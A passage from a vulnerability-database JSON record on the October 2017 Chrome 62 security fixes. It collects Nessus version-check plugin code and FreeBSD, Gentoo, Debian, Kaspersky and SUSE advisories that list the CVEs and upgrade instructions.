value:\"https://security-tracker.debian.org/tracker/CVE-2017-15394\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-15395\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-15396\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/chromium-browser\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-4020\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the chromium-browser packages.\n\nFor the oldstable distribution (jessie), security support for chromium\nhas been discontinued.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 62.0.3202.75-1~deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"chromedriver\", reference:\"62.0.3202.75-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium\", reference:\"62.0.3202.75-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-driver\", reference:\"62.0.3202.75-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-l10n\", reference:\"62.0.3202.75-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-shell\", reference:\"62.0.3202.75-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-widevine\", reference:\"62.0.3202.75-1~deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-01T03:49:09", "description": "The version of Google Chrome installed on the remote macOS or Mac OS X\nhost is prior to 62.0.32. It is, therefore, affected by multiple \nvulnerabilities as noted in Chrome stable channel update release notes\nfor October 17th 2017. Please refer to the release notes for additional \ninformation.", "edition": 30, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-10-18T00:00:00", "title": "Google Chrome < 62.0.3202.62 Multiple Vulnerabilities (macOS)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-5131", "CVE-2017-15395", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-5125", "CVE-2017-15389", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-15393", "CVE-2017-5127", "CVE-2017-15386", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5130", "CVE-2017-5124"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_62_0_3202_62.NASL", "href": "https://www.tenable.com/plugins/nessus/103934", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103934);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-5124\",\n \"CVE-2017-5125\",\n \"CVE-2017-5126\",\n \"CVE-2017-5127\",\n \"CVE-2017-5128\",\n \"CVE-2017-5129\",\n \"CVE-2017-5130\",\n \"CVE-2017-5131\",\n \"CVE-2017-5132\",\n \"CVE-2017-5133\",\n \"CVE-2017-15386\",\n \"CVE-2017-15387\",\n \"CVE-2017-15388\",\n \"CVE-2017-15389\",\n \"CVE-2017-15390\",\n \"CVE-2017-15391\",\n \"CVE-2017-15392\",\n \"CVE-2017-15393\",\n \"CVE-2017-15394\",\n \"CVE-2017-15395\"\n );\n\n script_name(english:\"Google Chrome < 62.0.3202.62 Multiple Vulnerabilities (macOS)\");\n script_summary(english:\"Checks the version of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple unspecified vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS or Mac OS X\nhost is prior to 62.0.32. It is, therefore, affected by multiple \nvulnerabilities as noted in Chrome stable channel update release notes\nfor October 17th 2017. Please refer to the release notes for additional \ninformation.\");\n # https://chromereleases.googleblog.com/2017/10/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?441fea3d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 62.0.3202.62 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5133\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'62.0.3202.62', severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-01T03:22:17", "description": "The version of Google Chrome installed on the remote Windows host is\nprior to 62.0.3202.62. It is, therefore, affected by multiple \nvulnerabilities as noted in Chrome stable channel update release notes.\nPlease refer to the release notes for additional information.\n\nNote that Nessus has not attempted to exploit these issues but has\ninstead relied only on the application's self-reported version number.", "edition": 32, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-10-18T00:00:00", "title": "Google Chrome < 62.0.3202.62 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-5131", "CVE-2017-15395", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-5125", "CVE-2017-15389", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-15393", "CVE-2017-5127", "CVE-2017-15386", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5130", "CVE-2017-5124"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_62_0_3202_62.NASL", "href": "https://www.tenable.com/plugins/nessus/103933", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103933);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-5124\",\n \"CVE-2017-5125\",\n \"CVE-2017-5126\",\n \"CVE-2017-5127\",\n \"CVE-2017-5128\",\n \"CVE-2017-5129\",\n \"CVE-2017-5130\",\n \"CVE-2017-5131\",\n \"CVE-2017-5132\",\n \"CVE-2017-5133\",\n \"CVE-2017-15386\",\n \"CVE-2017-15387\",\n \"CVE-2017-15388\",\n \"CVE-2017-15389\",\n \"CVE-2017-15390\",\n \"CVE-2017-15391\",\n \"CVE-2017-15392\",\n \"CVE-2017-15393\",\n \"CVE-2017-15394\",\n \"CVE-2017-15395\"\n );\n\n script_name(english:\"Google Chrome < 62.0.3202.62 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 62.0.3202.62. It is, therefore, affected by multiple \nvulnerabilities as noted in Chrome stable channel update release notes.\nPlease refer to the release notes for additional information.\n\nNote that Nessus has not attempted to exploit these issues but has\ninstead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2017/10/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?441fea3d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 62.0.3202.62 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5133\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'62.0.3202.62', severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:07", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-5131", "CVE-2017-15395", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-5125", "CVE-2017-15389", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-15393", "CVE-2017-5127", "CVE-2017-15386", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5130", "CVE-2017-5124"], "description": "\nGoogle Chrome Releases reports:\n\n35 security fixes in this release, including:\n\n[762930] High CVE-2017-5124: UXSS with MHTML. Reported by\n\t Anonymous on 2017-09-07\n[749147] High CVE-2017-5125: Heap overflow in Skia. Reported by\n\t Anonymous on 2017-07-26\n[760455] High CVE-2017-5126: Use after free in PDFium. Reported by\n\t Luat Nguyen on KeenLab, Tencent on 2017-08-30\n[765384] High CVE-2017-5127: Use after free in PDFium. Reported by\n\t Luat Nguyen on KeenLab, Tencent on 2017-09-14\n[765469] High CVE-2017-5128: Heap overflow in WebGL. Reported by\n\t Omair on 2017-09-14\n[765495] High CVE-2017-5129: Use after free in WebAudio. Reported by\n\t Omair on 2017-09-15\n[718858] High CVE-2017-5132: Incorrect stack manipulation in WebAssembly. Reported by\n\t Gaurav Dewan of Adobe Systems India Pvt. Ltd. on 2017-05-05\n[722079] High CVE-2017-5130: Heap overflow in libxml2. Reported by\n\t Pranjal Jumde on 2017-05-14\n[744109] Medium CVE-2017-5131: Out of bounds write in Skia. Reported by\n\t Anonymous on 2017-07-16\n[762106] Medium CVE-2017-5133: Out of bounds write in Skia. Reported by\n\t Aleksandar Nikolic of Cisco Talos on 2017-09-05\n[752003] Medium CVE-2017-15386: UI spoofing in Blink. Reported by\n\t WenXu Wu of Tencent's Xuanwu Lab on 2017-08-03\n[756040] Medium CVE-2017-15387: Content security bypass. Reported by\n\t Jun Kokatsu on 2017-08-16\n[756563] Medium CVE-2017-15388: Out of bounds read in Skia. Reported by\n\t Kushal Arvind Shah of Fortinet's FortiGuard Labs on 2017-08-17\n[739621] Medium CVE-2017-15389: URL spoofing in Omnibox. Reported by\n\t xisigr of Tencent's Xuanwu Lab on 2017-07-06\n[750239] Medium CVE-2017-15390: URL spoofing in Omnibox. Reported by\n\t Haosheng Wang on 2017-07-28\n[598265] Low CVE-2017-15391: Extension limitation bypass in Extensions. Reported by\n\t Joao Lucas Melo Brasio on 2016-03-28\n[714401] Low CVE-2017-15392: Incorrect registry key handling in PlatformIntegration.\n\t Reported by Xiaoyin Liu on 2017-04-22\n[732751] Low CVE-2017-15393: Referrer leak in Devtools. Reported by\n\t Svyat Mitin on 2017-06-13\n[745580] Low CVE-2017-15394: URL spoofing in extensions UI. Reported by\n\t Sam on 2017-07-18\n[759457] Low CVE-2017-15395: Null pointer dereference in ImageCapture. Reported by\n\t Johannes Bergman on 2017-08-28\n[775550] Various fixes from internal audits, fuzzing and other initiatives\n\n\n", "edition": 5, "modified": "2017-10-17T00:00:00", "published": "2017-10-17T00:00:00", "id": "A692BFFE-B6AD-11E7-A1C2-E8E0B747A45A", "href": "https://vuxml.freebsd.org/freebsd/a692bffe-b6ad-11e7-a1c2-e8e0b747a45a.html", "title": "chromium -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2017-10-23T04:34:50", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-5131", "CVE-2017-15395", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-5125", "CVE-2017-15389", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-15393", "CVE-2017-5127", "CVE-2017-15386", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5130", "CVE-2017-5124"], "description": "### Background\n\nChromium is an open-source browser project that aims to build a safer, faster, and more stable way for all users to experience the web. \n\nGoogle Chrome is one fast, simple, and secure browser for all your devices \n\n### Description\n\nMultiple vulnerabilities have been discovered in Chromium and Google Chrome. Please review the referenced CVE identifiers and Google Chrome Releases for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, bypass content security controls, or conduct URL spoofing. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Chromium users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/chromium-62.0.3202.62\"\n \n\nAll Google Chrome users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/google-chrome-62.0.3202.62\"", "edition": 1, "modified": "2017-10-23T00:00:00", "published": "2017-10-23T00:00:00", "href": "https://security.gentoo.org/glsa/201710-24", "id": "GLSA-201710-24", "title": "Chromium, Google Chrome: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 0.0, "vector": "NONE"}}], "debian": [{"lastseen": "2019-05-30T02:22:04", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-5131", "CVE-2017-15395", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-5125", "CVE-2017-15389", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-15393", "CVE-2017-5127", "CVE-2017-15386", "CVE-2017-15396", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5124"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4020-1 security@debian.org\nhttps://www.debian.org/security/ Michael Gilbert\nNovember 05, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium-browser\nCVE ID : CVE-2017-5124 CVE-2017-5125 CVE-2017-5126 CVE-2017-5127\n CVE-2017-5128 CVE-2017-5129 CVE-2017-5131 CVE-2017-5132\n CVE-2017-5133 CVE-2017-15386 CVE-2017-15387 CVE-2017-15388\n CVE-2017-15389 CVE-2017-15390 CVE-2017-15391 CVE-2017-15392\n CVE-2017-15393 CVE-2017-15394 CVE-2017-15395 CVE-2017-15396\n\nSeveral vulnerabilities have been discovered in the chromium web browser.\n\nIn addition, this message serves as an annoucment that security support for\nchromium in the oldstable release (jessie), Debian 8, is now discontinued.\n\nDebian 8 chromium users that desire continued security updates are strongly\nencouraged to upgrade now to the current stable release (stretch), Debian 9.\n\nAn alternative is to switch to the firefox browser, which will continue to\nreceive security updates in jessie for some time.\n\nCVE-2017-5124\n\n A cross-site scripting issue was discovered in MHTML.\n\nCVE-2017-5125\n\n A heap overflow issue was discovered in the skia library.\n\nCVE-2017-5126\n\n Luat Nguyen discovered a use-after-free issue in the pdfium library.\n\nCVE-2017-5127\n\n Luat Nguyen discovered another use-after-free issue in the pdfium\n library.\n\nCVE-2017-5128\n\n Omair discovered a heap overflow issue in the WebGL implementation.\n\nCVE-2017-5129\n\n Omair discovered a use-after-free issue in the WebAudio implementation.\n\nCVE-2017-5131\n\n An out-of-bounds write issue was discovered in the skia library.\n\nCVE-2017-5132\n\n Guarav Dewan discovered an error in the WebAssembly implementation.\n\nCVE-2017-5133\n\n Aleksandar Nikolic discovered an out-of-bounds write issue in the skia\n library.\n\nCVE-2017-15386\n\n WenXu Wu discovered a user interface spoofing issue.\n\nCVE-2017-15387\n\n Jun Kokatsu discovered a way to bypass the content security policy.\n\nCVE-2017-15388\n\n Kushal Arvind Shah discovered an out-of-bounds read issue in the skia\n library.\n\nCVE-2017-15389\n\n xisigr discovered a URL spoofing issue.\n\nCVE-2017-15390\n\n Haosheng Wang discovered a URL spoofing issue.\n\nCVE-2017-15391\n\n Joao Lucas Melo Brasio discovered a way for an extension to bypass its\n limitations.\n\nCVE-2017-15392\n\n Xiaoyin Liu discovered an error the implementation of registry keys.\n\nCVE-2017-15393\n\n Svyat Mitin discovered an issue in the devtools.\n\nCVE-2017-15394\n\n Sam discovered a URL spoofing issue.\n\nCVE-2017-15395\n\n Johannes Bergman discovered a null pointer dereference issue.\n\nCVE-2017-15396\n\n Yuan Deng discovered a stack overflow issue in the v8 javascript library.\n\nFor the oldstable distribution (jessie), security support for chromium has\nbeen discontinued.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 62.0.3202.75-1~deb9u1.\n\nFor the testing distribution (buster), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 62.0.3202.75-1.\n\nWe recommend that you upgrade your chromium-browser packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2017-11-07T02:14:33", "published": "2017-11-07T02:14:33", "id": "DEBIAN:DSA-4020-1:D6119", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00282.html", "title": "[SECURITY] [DSA 4020-1] chromium-browser security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2020-09-02T11:49:55", "bulletinFamily": "info", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-5131", "CVE-2017-15395", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-5125", "CVE-2017-15389", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-15393", "CVE-2017-5127", "CVE-2017-15386", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5130", "CVE-2017-5124"], "description": "### *Detect date*:\n10/17/2017\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Google Chrome. Malicious users can exploit these vulnerabilities to cause a denial of service, bypass security restrictions, to spoof user interface, execute arbitrary code and perform cross-site scripting attack.\n\n### *Affected products*:\nGoogle Chrome versions earlier than 62.0.3202.62\n\n### *Solution*:\nUpdate to the latest version. File with name old_chrome can be still detected after update. It caused by Google Chrome update policy which does not remove old versions when installing updates. Try to contact vendor for further delete instructions or ignore such kind of alerts at your own risk. \n[Download Google Chrome](<https://www.google.com/chrome/browser/desktop/>)\n\n### *Original advisories*:\n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2017/10/stable-channel-update-for-desktop.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2017-15388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15388>)6.8High \n[CVE-2017-15389](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15389>)4.3Warning \n[CVE-2017-15390](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15390>)4.3Warning \n[CVE-2017-15391](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15391>)4.3Warning \n[CVE-2017-15392](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15392>)4.0Warning \n[CVE-2017-15393](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15393>)6.8High \n[CVE-2017-15394](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15394>)4.3Warning \n[CVE-2017-15395](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15395>)4.3Warning \n[CVE-2017-5124](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5124>)4.3Warning \n[CVE-2017-5125](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5125>)6.8High \n[CVE-2017-5126](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5126>)6.8High \n[CVE-2017-5127](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5127>)6.8High \n[CVE-2017-5128](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5128>)6.8High \n[CVE-2017-5129](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5129>)6.8High \n[CVE-2017-5132](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5132>)6.8High \n[CVE-2017-5130](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5130>)6.8High \n[CVE-2017-5131](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5131>)6.8High \n[CVE-2017-5133](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5133>)6.8High \n[CVE-2017-15386](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15386>)4.3Warning \n[CVE-2017-15387](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15387>)6.8High", "edition": 44, "modified": "2020-05-22T00:00:00", "published": "2017-10-17T00:00:00", "id": "KLA11117", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11117", "title": "\r KLA11117Multiple vulnerabilities in Google Chrome ", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2017-10-29T02:31:58", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-5131", "CVE-2017-15395", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-5125", "CVE-2017-15389", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-15393", "CVE-2017-5127", "CVE-2017-15386", "CVE-2017-15396", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5130", "CVE-2017-5124"], "description": "This update to Chromium 62.0.3202.75 fixes the following security issues:\n\n - CVE-2017-5124: UXSS with MHTML\n - CVE-2017-5125: Heap overflow in Skia\n - CVE-2017-5126: Use after free in PDFium\n - CVE-2017-5127: Use after free in PDFium\n - CVE-2017-5128: Heap overflow in WebGL\n - CVE-2017-5129: Use after free in WebAudio\n - CVE-2017-5132: Incorrect stack manipulation in WebAssembly.\n - CVE-2017-5130: Heap overflow in libxml2\n - CVE-2017-5131: Out of bounds write in Skia\n - CVE-2017-5133: Out of bounds write in Skia\n - CVE-2017-15386: UI spoofing in Blink\n - CVE-2017-15387: Content security bypass\n - CVE-2017-15388: Out of bounds read in Skia\n - CVE-2017-15389: URL spoofing in OmniBox\n - CVE-2017-15390: URL spoofing in OmniBox\n - CVE-2017-15391: Extension limitation bypass in Extensions.\n - CVE-2017-15392: Incorrect registry key handling in PlatformIntegration\n - CVE-2017-15393: Referrer leak in Devtools\n - CVE-2017-15394: URL spoofing in extensions UI\n - CVE-2017-15395: Null pointer dereference in ImageCapture\n - CVE-2017-15396: Stack overflow in V8\n\n", "edition": 1, "modified": "2017-10-29T00:09:20", "published": "2017-10-29T00:09:20", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00084.html", "id": "OPENSUSE-SU-2017:2902-1", "title": "Security update for chromium (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-12-08T15:45:32", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5128", "CVE-2017-15417", "CVE-2017-5132", "CVE-2017-5131", "CVE-2017-15409", "CVE-2017-15423", "CVE-2017-15395", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-5133", "CVE-2017-15419", "CVE-2017-15399", "CVE-2017-15392", "CVE-2017-15425", "CVE-2017-15410", "CVE-2017-5125", "CVE-2017-15389", "CVE-2017-15387", "CVE-2017-15422", "CVE-2017-15427", "CVE-2017-15418", "CVE-2017-15411", "CVE-2017-5126", "CVE-2017-15412", "CVE-2017-15393", "CVE-2017-15415", "CVE-2017-5127", "CVE-2017-15398", "CVE-2017-15386", "CVE-2017-15426", "CVE-2017-15413", "CVE-2017-15408", "CVE-2017-15396", "CVE-2017-15388", "CVE-2017-15416", "CVE-2017-15424", "CVE-2017-5129", "CVE-2017-15420", "CVE-2017-15394", "CVE-2017-5130", "CVE-2017-5124"], "description": "This update to Chromium 63.0.3239.84 fixes the following security issues:\n\n - CVE-2017-5124: UXSS with MHTML\n - CVE-2017-5125: Heap overflow in Skia\n - CVE-2017-5126: Use after free in PDFium\n - CVE-2017-5127: Use after free in PDFium\n - CVE-2017-5128: Heap overflow in WebGL\n - CVE-2017-5129: Use after free in WebAudio\n - CVE-2017-5132: Incorrect stack manipulation in WebAssembly.\n - CVE-2017-5130: Heap overflow in libxml2\n - CVE-2017-5131: Out of bounds write in Skia\n - CVE-2017-5133: Out of bounds write in Skia\n - CVE-2017-15386: UI spoofing in Blink\n - CVE-2017-15387: Content security bypass\n - CVE-2017-15388: Out of bounds read in Skia\n - CVE-2017-15389: URL spoofing in OmniBox\n - CVE-2017-15390: URL spoofing in OmniBox\n - CVE-2017-15391: Extension limitation 